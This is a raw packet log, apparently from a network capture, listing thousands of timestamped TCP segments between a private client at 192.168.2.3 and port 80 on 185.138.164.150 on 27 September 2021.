Sep 27, 2021 23:55:25.143084049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143096924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143111944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143147945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143163919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143178940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143201113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143215895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143238068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143259048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143277884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143296957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143317938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143338919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143362045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143383980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143404007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143419027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143439054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143462896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143492937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143512011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143531084 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143551111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143568993 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143587112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.146806955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.146841049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.146863937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.154341936 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.154493093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.154563904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.154587030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.154613018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.154638052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.163358927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.163414001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.163434029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.163454056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.163474083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.163492918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.180907965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.202078104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202126026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202167988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202186108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202203989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202238083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202255011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202272892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202297926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202316046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202333927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202352047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202373981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202398062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202420950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202442884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202465057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202487946 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202512980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202536106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202559948 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202581882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202605009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202626944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202649117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202671051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202696085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.202718973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.211713076 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.211754084 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.211759090 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.211770058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.216702938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216748953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216773987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216799021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216823101 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216849089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216850996 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.216875076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216878891 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.216898918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216923952 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216938019 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.216948986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.216981888 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.217015028 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.247708082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.247745037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.247906923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.247935057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.247972012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248009920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248083115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248106956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248204947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248256922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248325109 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248347998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.248368979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.249125004 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249155998 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249160051 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249164104 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249167919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249171019 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249174118 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249176979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249180079 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249182940 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249186039 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249188900 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.249191999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.251692057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.251734972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.251758099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.251784086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.251792908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.251821041 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.251882076 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.253277063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253310919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253334045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253356934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253377914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253401041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253423929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.253433943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.253465891 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.284598112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284692049 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.284704924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284739017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284763098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284807920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.284909964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284938097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284961939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.284976006 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.284986019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285010099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285017967 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.285057068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.285331011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285636902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285666943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285754919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.285845995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285878897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285923958 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.285967112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.285994053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286041975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286067009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286077976 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.286094904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286159039 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.286185980 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.286827087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286926985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286952972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.286978960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.287009001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.287026882 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.287053108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.289437056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.289563894 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.289803982 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.289848089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.289908886 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.290189028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.291690111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.291723013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.291851997 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.319767952 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.319812059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.319842100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.319865942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.319865942 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.319892883 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.320203066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.320286036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.320317984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.321333885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.321405888 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.321814060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322187901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322261095 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.322405100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322834015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322863102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322896004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322896957 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.322923899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322937012 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.322947979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322968960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322993040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.322993040 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.323014975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323035002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.323039055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323084116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323102951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323137045 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.323141098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323163986 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.323163986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323187113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323210001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.323214054 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.323261976 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.324810028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.324841022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.324862003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.324884892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.324914932 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.324940920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.326277018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.326308012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.326332092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.326430082 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.326472998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.326527119 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.354753017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.354788065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.354811907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.354988098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.355014086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358064890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358097076 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358122110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358144999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358166933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358189106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358211040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358236074 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358258963 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358279943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.358303070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.360529900 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.360557079 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.362098932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.362142086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.363776922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.363805056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.363826990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.363845110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.363867044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.363892078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.364931107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.364957094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.364963055 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.364980936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.364988089 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.364990950 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.364994049 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.365005016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.365027905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.365051985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.365075111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.373004913 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.400764942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.400918961 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.402678013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402720928 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402748108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402771950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402796984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402817965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402837992 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402842999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.402859926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402872086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.402883053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402900934 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.402909994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402935028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402957916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402960062 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.402982950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.402995110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.403007984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403031111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403043032 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.403054953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403078079 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403093100 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.403106928 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403155088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403179884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403194904 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.403203964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403228998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403234959 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.403253078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403276920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.403280020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403305054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.403318882 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.408263922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408396006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408418894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408442020 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.408463001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408478975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408482075 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.408494949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408549070 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.408555984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408575058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.408603907 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.436218977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.436384916 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.438169956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438278913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438386917 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.438453913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438605070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438698053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438725948 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.438801050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438868999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.438944101 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.438978910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439002037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439028978 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439038038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439088106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.439162970 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.439177036 CEST	80	49745	185.138.164.150	192.168.2.3
